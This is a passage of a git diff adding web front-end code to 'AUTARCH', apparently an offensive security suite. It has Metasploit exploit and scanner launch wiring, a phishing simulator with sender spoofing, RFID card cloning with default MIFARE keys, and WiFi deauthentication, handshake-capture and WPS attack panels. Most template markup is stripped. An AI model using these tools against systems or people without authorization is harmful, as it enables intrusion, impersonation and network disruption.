+    'smb-pipe-auditor':{path: 'auxiliary/scanner/smb/pipe_auditor',   opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
+    // HTTP
+    'http-dir-scanner': {path: 'auxiliary/scanner/http/dir_scanner',  opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80, THREADS: parseInt(v('http-threads')) || 5, PATH: v('http-targeturi') || '/'})},
+    'http-title':       {path: 'auxiliary/scanner/http/title',        opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80})},
+    'http-robots':      {path: 'auxiliary/scanner/http/robots_txt',   opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80})},
+    'http-cert':        {path: 'auxiliary/scanner/http/cert',         opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 443})},
+    // Exploit
+    'exploit-run':   {path: null, opts: () => {
+        const o = {RHOSTS: v('exp-rhosts'), LHOST: v('exp-lhost'), LPORT: parseInt(v('exp-lport')) || 4444};
+        const payload = v('exp-payload');
+        if (payload) o.PAYLOAD = payload;
+        return o;
+    }},
+    // Custom
+    'custom':        {path: null, opts: () => {try{return JSON.parse(v('custom-options') || '{}')}catch(e){return {}}}},
 };
 
 function v(id) { const el = document.getElementById(id); return el ? el.value.trim() : ''; }
 
+/* ── Server Control ─────────────────────────────────────────────── */
+function checkMSFStatus() {
+    fetch('/offense/status').then(r => r.json()).then(d => {
+        const el = document.getElementById('msf-status');
+        const ver = document.getElementById('msf-version');
+        const btnConnect = document.getElementById('btn-connect');
+        const btnDisconnect = document.getElementById('btn-disconnect');
+        const btnStart = document.getElementById('btn-start-server');
+        const btnStop = document.getElementById('btn-stop-server');
+
+        if (d.connected) {
+            el.innerHTML = 'Connected';
+            ver.textContent = d.version ? 'Metasploit ' + d.version : '';
+            btnConnect.style.display = 'none';
+            btnDisconnect.style.display = '';
+            btnStop.style.display = d.server_running ? '' : 'none';
+            btnStart.style.display = 'none';
+        } else if (d.server_running) {
+            el.innerHTML = 'Server running (not connected)';
+            ver.textContent = '';
+            btnConnect.style.display = '';
+            btnDisconnect.style.display = 'none';
+            btnStop.style.display = '';
+            btnStart.style.display = 'none';
+        } else {
+            el.innerHTML = 'Not running';
+            ver.textContent = '';
+            btnConnect.style.display = 'none';
+            btnDisconnect.style.display = 'none';
+            btnStop.style.display = 'none';
+            btnStart.style.display = '';
+        }
+
+        // Populate settings panel
+        if (d.host) document.getElementById('msf-host').value = d.host;
+        if (d.port) document.getElementById('msf-port').value = d.port;
+        if (d.username) document.getElementById('msf-user').value = d.username;
+        document.getElementById('msf-ssl').checked = d.ssl !== false;
+    }).catch(() => {
+        document.getElementById('msf-status').innerHTML = 'Error checking status';
+    });
+}
+
+function toggleServerPanel() {
+    const panel = document.getElementById('server-panel');
+    panel.style.display = panel.style.display === 'none' ? '' : 'none';
+}
+
+function _getServerSettings() {
+    return {
+        host: v('msf-host') || '127.0.0.1',
+        port: parseInt(v('msf-port')) || 55553,
+        username: v('msf-user') || 'msf',
+        password: v('msf-pass'),
+        ssl: document.getElementById('msf-ssl').checked,
+    };
+}
+
+function msfStartServer() {
+    const settings = _getServerSettings();
+    if (!settings.password) { alert('Password is required'); return; }
+    const msg = document.getElementById('server-msg');
+    msg.textContent = 'Starting server...';
+
+    fetch('/offense/server/start', {
+        method: 'POST', headers: {'Content-Type': 'application/json'},
+        body: JSON.stringify(settings)
+    }).then(r => r.json()).then(d => {
+        msg.textContent = d.ok ? (d.message || 'Started') : ('Error: ' + (d.error || 'unknown'));
+        if (d.ok) { document.getElementById('server-panel').style.display = 'none'; checkMSFStatus(); }
+    }).catch(e => { msg.textContent = 'Error: ' + e.message; });
+}
+
+function msfConnectOnly() {
+    const settings = _getServerSettings();
+    if (!settings.password) { alert('Password is required'); return; }
+    const msg = document.getElementById('server-msg');
+    msg.textContent = 'Connecting...';
+
+    fetch('/offense/connect', {
+        method: 'POST', headers: {'Content-Type': 'application/json'},
+        body: JSON.stringify({password: settings.password})
+    }).then(r => r.json()).then(d => {
+        msg.textContent = d.ok ? 'Connected' : ('Error: ' + (d.error || 'unknown'));
+        if (d.ok) { document.getElementById('server-panel').style.display = 'none'; checkMSFStatus(); }
+    }).catch(e => { msg.textContent = 'Error: ' + e.message; });
+}
+
+function msfConnect() {
+    // Quick connect using saved password
+    fetch('/offense/connect', {
+        method: 'POST', headers: {'Content-Type': 'application/json'},
+        body: JSON.stringify({})
+    }).then(r => r.json()).then(d => {
+        if (d.ok) { checkMSFStatus(); }
+        else { toggleServerPanel(); document.getElementById('server-msg').textContent = d.error || 'Connection failed — enter password'; }
+    });
+}
+
+function msfDisconnect() {
+    fetch('/offense/disconnect', {method: 'POST'}).then(() => checkMSFStatus());
+}
+
+function msfStopServer() {
+    if (!confirm('Stop the MSF RPC server?')) return;
+    fetch('/offense/server/stop', {method: 'POST'}).then(() => checkMSFStatus());
+}
+
+function msfSaveSettings() {
+    const settings = _getServerSettings();
+    fetch('/offense/settings', {
+        method: 'POST', headers: {'Content-Type': 'application/json'},
+        body: JSON.stringify(settings)
+    }).then(r => r.json()).then(d => {
+        document.getElementById('server-msg').textContent = d.ok ? 'Settings saved' : ('Error: ' + d.error);
+    });
+}
+
+/* ── Module Execution ───────────────────────────────────────────── */
 function toggleBruteRow() {
     var row = document.getElementById('ssh-brute-row');
     row.style.display = row.style.display === 'none' ? '' : 'none';
@@ -222,10 +528,19 @@ function toggleBruteRow() {
 function runFeaturedModule(key) {
     const cfg = _FEATURED[key];
     if (!cfg) return;
-    const path = key === 'custom' ? v('custom-module') : cfg.path;
+    let path;
+    if (key === 'custom') {
+        path = v('custom-module');
+    } else if (key === 'exploit-run') {
+        path = v('exp-module');
+    } else {
+        path = cfg.path;
+    }
     if (!path) { alert('Enter a module path'); return; }
     const opts = cfg.opts();
-    if (!opts.RHOSTS && key !== 'custom') { alert('Enter a target in RHOSTS'); return; }
+    // Remove empty string values
+    Object.keys(opts).forEach(k => { if (opts[k] === '' || opts[k] === undefined) delete opts[k]; });
+    if (!opts.RHOSTS && !['custom'].includes(key)) { alert('Enter a target'); return; }
     runModule(path, opts);
 }
 
@@ -234,14 +549,10 @@ function runModule(module_path, options) {
     const status = document.getElementById('run-status');
     const stopBtn = document.getElementById('run-stop-btn');
     out.innerHTML = '';
-    status.textContent = 'Starting...';
+    status.textContent = 'Starting ' + module_path + '...';
     stopBtn.style.display = '';
     _currentJobId = null;
 
-    const es = new EventSource('/offense/module/run?' + new URLSearchParams({_body: JSON.stringify({module_path, options})}));
-
-    // Use fetch + ReadableStream (EventSource doesn't support POST)
-    es.close();
     fetch('/offense/module/run', {
         method: 'POST',
         headers: {'Content-Type': 'application/json'},
@@ -261,14 +572,27 @@ function runModule(module_path, options) {
                     if (!line) return;
                     try {
                         const d = JSON.parse(line);
-                        if (d.job_id) { _currentJobId = d.job_id; status.textContent = 'Running…'; }
+                        if (d.job_id) { _currentJobId = d.job_id; status.textContent = 'Running ' + module_path + '…'; }
                         if (d.error) { out.innerHTML += '
    Error: ' + escapeHtml(d.error) + '
    '; stopBtn.style.display = 'none'; }
-                        if (d.line)  { out.innerHTML += '
    ' + escapeHtml(d.line) + '
    '; out.scrollTop = out.scrollHeight; }
-                        if (d.done)  {
+                        if (d.line) {
+                            let cls = '';
+                            if (d.line.includes('[+]')) cls = 'success';
+                            else if (d.line.includes('[-]') || d.line.includes('Error')) cls = 'err';
+                            else if (d.line.includes('[!]')) cls = 'warn';
+                            out.innerHTML += '
    ' + escapeHtml(d.line) + '
    ';
+                            out.scrollTop = out.scrollHeight;
+                        }
+                        if (d.done) {
                             status.textContent = 'Done.';
                             stopBtn.style.display = 'none';
-                            if (d.open_ports && d.open_ports.length) out.innerHTML += '
    Open ports: ' + escapeHtml(d.open_ports.join(', ')) + '
    ';
-                            if (d.findings && d.findings.length) out.innerHTML += '
    Findings: ' + escapeHtml(JSON.stringify(d.findings)) + '
    ';
+                            if (d.open_ports && d.open_ports.length) {
+                                out.innerHTML += '
    Open ports: ' + d.open_ports.map(p => escapeHtml(String(p.port || p))).join(', ') + '
    ';
+                            }
+                            if (d.services && d.services.length) {
+                                let html = '
    Services detected:
    ';
+                                d.services.forEach(s => { html += '
    ' + escapeHtml(s.ip + ':' + s.port + ' — ' + s.info) + '
    '; });
+                                out.innerHTML += html;
+                            }
                         }
                     } catch(e) {}
                 });
@@ -286,7 +610,45 @@ function stopCurrentModule() {
     document.getElementById('run-status').textContent = 'Stopped.';
 }
 
-// Agent Hal
+/* ── Sessions & Jobs ────────────────────────────────────────────── */
+function loadMSFSessions() {
+    const el = document.getElementById('msf-sessions');
+    fetch('/offense/sessions').then(r => r.json()).then(d => {
+        if (d.error) { el.innerHTML = '
    ' + escapeHtml(d.error) + '
    '; return; }
+        const sessions = d.sessions || {};
+        const keys = Object.keys(sessions);
+        if (!keys.length) { el.innerHTML = '
    No active sessions.
    '; return; }
+        let html = '';
+        keys.forEach(sid => {
+            const s = sessions[sid];
+            html += '';
+        });
+        html += '
    IDTypeTargetInfo
    ' + escapeHtml(sid) + '' + escapeHtml(s.type || '') + '' + escapeHtml(s.tunnel_peer || s.target_host || '') + '' + escapeHtml(s.info || '') + '
    ';
+        el.innerHTML = html;
+    }).catch(() => { el.innerHTML = '
    Failed to load sessions.
    '; });
+}
+
+function loadMSFJobs() {
+    const el = document.getElementById('msf-jobs');
+    fetch('/offense/jobs').then(r => r.json()).then(d => {
+        if (d.error) { el.innerHTML = '
    ' + escapeHtml(d.error) + '
    '; return; }
+        const jobs = d.jobs || {};
+        const keys = Object.keys(jobs);
+        if (!keys.length) { el.innerHTML = '
    No running jobs.
    '; return; }
+        let html = '';
+        keys.forEach(jid => {
+            html += '';
+        });
+        html += '
    IDName
    ' + escapeHtml(jid) + '' + escapeHtml(String(jobs[jid])) + '
    ';
+        el.innerHTML = html;
+    }).catch(() => { el.innerHTML = '
    Failed to load jobs.
    '; });
+}
+
+function stopMSFJob(jobId) {
+    fetch('/offense/jobs/' + jobId + '/stop', {method:'POST'}).then(() => loadMSFJobs());
+}
+
+/* ── Agent Hal ──────────────────────────────────────────────────── */
 async function runHalTask() {
     const task = v('agent-task');
     if (!task) return;
diff --git a/web/templates/password_toolkit.html b/web/templates/password_toolkit.html
new file mode 100644
index 0000000..9a5704e
--- /dev/null
+++ b/web/templates/password_toolkit.html
@@ -0,0 +1,385 @@
+{% extends "base.html" %}
+{% block title %}Password Toolkit — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Password Toolkit
    
+    
    Hash identification, cracking, generation, and credential testing
    
+
    
+
+
    
+    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Hash Identification
    
+        
    
+            
+            
+        
    
+        
+        
    
+    
    
+    
    
+        
    Hash a String
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
+        
    
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/phishmail.html b/web/templates/phishmail.html
new file mode 100644
index 0000000..7c95aae
--- /dev/null
+++ b/web/templates/phishmail.html
@@ -0,0 +1,1091 @@
+{% extends "base.html" %}
+{% block title %}Gone Fishing — AUTARCH{% endblock %}
+{% block content %}
+
    Gone Fishing Mail Service
    
+
    
+    Demo Version — This is a demo of the mail module. A full version is available by request and verification of the user's intent.
+
    
+
    
+    Local network phishing simulator — sender spoofing, campaigns, tracking, certificate generation.
+    Local network only.
+
    
+
+
+
    
+    
+    
+    
+    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Compose Email
    
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
+                
+            
    
+            
    
+                
+                
+            
    
+        
    
+
+        
+        
    
+            
+            
+        
    
+
+        
+        
    
+            
    
+                
+                
+            
    
+            
    
+                
+                
    
+            
    
+        
    
+        
    
+            
+            
+        
    
+
+        
+        
    
+            SMTP Settings
+            
    
+                
    
+                    
+                    
+                
    
+                
    
+                    
+                    
+                
    
+                
    
+                    
+                    
+                
    
+                
    
+                    
+                    
+                
    
+                
    
+                    
+                    
+                
    
+                
    
+                    
+                    
+                
    
+            
    
+        
    
+
+        
    
+            
+            
+            
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/report_engine.html b/web/templates/report_engine.html
new file mode 100644
index 0000000..d95115a
--- /dev/null
+++ b/web/templates/report_engine.html
@@ -0,0 +1,246 @@
+{% extends "base.html" %}
+{% block title %}Reports — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Reporting Engine
    
+    
    Pentest report builder with findings, CVSS scoring, and export
    
+
    
+
+
    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Reports
    
+        
+    
    
+    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/rfid_tools.html b/web/templates/rfid_tools.html
new file mode 100644
index 0000000..980800e
--- /dev/null
+++ b/web/templates/rfid_tools.html
@@ -0,0 +1,286 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — RFID/NFC Tools{% endblock %}
+
+{% block content %}
+
    
+    
    RFID/NFC Tools
    
+    
    
+        Proxmark3 interface for RFID/NFC scanning, cloning, and card management.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Tools Status
    
+    
    
+        
    
+            
    Proxmark3
    
+            
    
+                
+                Checking...
+            
    
+        
    
+        
    
+            
    libnfc
    
+            
    
+                
+                Checking...
+            
    
+        
    
+    
    
+
    
+
+
    
+    
    Scan for Cards
    
+    
    
+        
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Last Read Card
    
+    
+        
+            
+            
+            
+            
+        
+    
    Type--
    ID / UID--
    Frequency--
    Technology--
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    EM410x Clone
    
+    
    
+        Clone an EM410x LF card by writing a known card ID to a T55x7 blank.
+    
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    MIFARE Classic
    
+    
    
+        
+    
    
+    
    
+
+    
    Clone from Dump
    
+    
    
+        
+        
+    
    
+    
    
+
+    
    Default Keys
    
+    
    
+        FFFFFFFFFFFF (factory default)
    
+        A0A1A2A3A4A5 (MAD key)
    
+        D3F7D3F7D3F7 (NFC NDEF)
    
+        000000000000 (null key)
    
+        B0B1B2B3B4B5 (common transport)
    
+        4D3A99C351DD (Mifare Application Directory)
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Saved Cards
    
+    
+        
+        
+            
+        
+    
    NameTypeID / UIDSavedAction
    No saved cards yet. Scan and save cards from the Scan tab.
    
+
    
+
+
    
+    
    Card Dumps
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    FilenameSizeDateAction
    No dumps found.
    
+
    
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/steganography.html b/web/templates/steganography.html
new file mode 100644
index 0000000..e500232
--- /dev/null
+++ b/web/templates/steganography.html
@@ -0,0 +1,431 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Steganography{% endblock %}
+
+{% block content %}
+
    
+    
    Steganography
    
+    
    
+        Hide data in files, extract hidden messages, and detect steganographic content.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Hide Message in File
    
+    
    
+        Embed a hidden message into an image, audio, or video carrier file using LSB steganography.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+        
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Whitespace Steganography
    
+    
    
+        Hide messages using invisible whitespace characters (tabs, spaces, zero-width chars) within text.
+    
    
+    
    
+        
+        
+    
    
+    
    
+        
+        
+    
    
+    
    
+        
+        
+        
+    
    
+    
    
+        
+        
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Extract Hidden Data
    
+    
    
+        Extract embedded messages from steganographic files.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+        
+        
    
+            
    No extraction performed yet.
    
+        
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Steganalysis
    
+    
    
+        Analyze a file for signs of steganographic content using statistical methods.
+    
    
+    
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+
    
+
+
+
+
    
+    
    Batch Scan
    
+    
    
+        Scan a directory of files for steganographic content.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/threat_intel.html b/web/templates/threat_intel.html
new file mode 100644
index 0000000..882c2a1
--- /dev/null
+++ b/web/templates/threat_intel.html
@@ -0,0 +1,606 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — Threat Intelligence{% endblock %}
+
+{% block content %}
+
    
+    
    Threat Intelligence
    
+    
    
+        IOC management, threat feeds, and correlation analysis.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Add Indicator of Compromise
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+
    
+
+
    
+    
    IOC Database
    
+    
    
+        
+        
+        
+    
    
+    
    
+        
+            
+                
+                    
+                    
+                
+            
+            
+                
+            
+        
    ValueTypeSeverityTagsAddedActions
    No IOCs loaded. Add one above or import.
    
+    
    
+    
    
+        Showing 0 indicators
+    
    
+
    
+
+
    
+    
    Bulk Import / Export
    
+    
    
+        
+        
+    
    
+    
    
+        
+        
+        
+        
+    
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Add Threat Feed
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+
    
+
+
    
+    
    Configured Feeds
    
+    
    
+        
+        
+    
    
+    
+        
+            
+                
+                
+            
+        
+        
+            
+        
+    
    NameTypeURLIOCsLast FetchedActions
    No feeds configured.
    
+
    
+
+
    
+    
    Feed Statistics
    
+    
    
+        
    
+            
    Total Feeds
    
+            
    0
    
+        
    
+        
    
+            
    Total IOCs from Feeds
    
+            
    0
    
+        
    
+        
    
+            
    Last Updated
    
+            
    --
    
+        
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Reputation Lookup
    
+    
    
+        Check IP/domain/hash reputation against VirusTotal, AbuseIPDB, and local IOC database.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+    
    Blocklist Generator
    
+    
    
+        Generate blocklists from your IOC database for firewalls and security tools.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Alerts
    
+    
    
+        
+        
+    
    
+    
    
+        
    No alerts. Alerts appear when IOCs match network traffic or log data.
    
+    
    
+
    
+
+
    
+
+
+{% endblock %}
diff --git a/web/templates/webapp_scanner.html b/web/templates/webapp_scanner.html
new file mode 100644
index 0000000..d3a6df4
--- /dev/null
+++ b/web/templates/webapp_scanner.html
@@ -0,0 +1,241 @@
+{% extends "base.html" %}
+{% block title %}Web Scanner — AUTARCH{% endblock %}
+{% block content %}
+
    
+    
    Web Application Scanner
    
+    
    Directory brute, subdomain enum, vuln scanning, header analysis
    
+
    
+
+
    
+    
+    
+    
+    
+    
+
    
+
+
+
    
+    
    
+        
    Quick Scan
    
+        
    
+            
    
+                
+            
    
+            
+        
    
+        
    
+    
    
+
    
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+{% endblock %}
diff --git a/web/templates/wifi_audit.html b/web/templates/wifi_audit.html
new file mode 100644
index 0000000..1e1bb17
--- /dev/null
+++ b/web/templates/wifi_audit.html
@@ -0,0 +1,453 @@
+{% extends "base.html" %}
+{% block title %}AUTARCH — WiFi Audit{% endblock %}
+
+{% block content %}
+
    
+    
    WiFi Auditing
    
+    
    
+        Wireless network scanning, attack tools, and monitoring.
+    
    
+
    
+
+
+
    
+    
+    
+    
+
    
+
+
+
    
+
+
    
+    
    Wireless Interfaces
    
+    
    
+        
+        
+        
+    
    
+    
+        
+        
+            
+        
+    
    InterfaceModeDriverChipsetStatus
    Click Refresh to list wireless interfaces.
    
+    
    
+        
+        
+    
    
+
    
+
+
    
+    
    Network Scan
    
+    
    
+        
+        
+    
    
+    
+        
+            
+                
+                
+            
+        
+        
+            
+        
+    
    BSSIDSSIDChannelEncryptionSignalClients
    No scan results yet.
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Deauthentication Attack
    
+    
    
+        Send deauthentication frames to disconnect clients from an access point.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+    
    Handshake Capture
    
+    
    
+        Capture WPA/WPA2 four-way handshake from a target network.
+    
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    WPS Attack
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    BSSIDSSIDWPS VersionLockedAction
    Click Scan to find WPS-enabled networks.
    
+    
    
+
    
+
+
    
+    
    Crack Handshake
    
+    
    
+        
    
+            
+            
+        
    
+        
    
+            
+            
+        
    
+    
    
+    
    
+        
+    
    
+    
    
+
    
+
+
    
+
+
+
    
+
+
    
+    
    Rogue AP Detection
    
+    
    
+        Save a baseline of known APs, then detect rogue or evil-twin access points.
+    
    
+    
    
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Packet Capture
    
+    
    
+        
+        
+        
+    
    
+    
    
+
    
+
+
    
+    
    Saved Captures
    
+    
    
+        
+    
    
+    
+        
+        
+            
+        
+    
    FilenameSizeDateActions
    Click Refresh to list saved capture files.
    
+
    
+
+
    
+
+
+{% endblock %}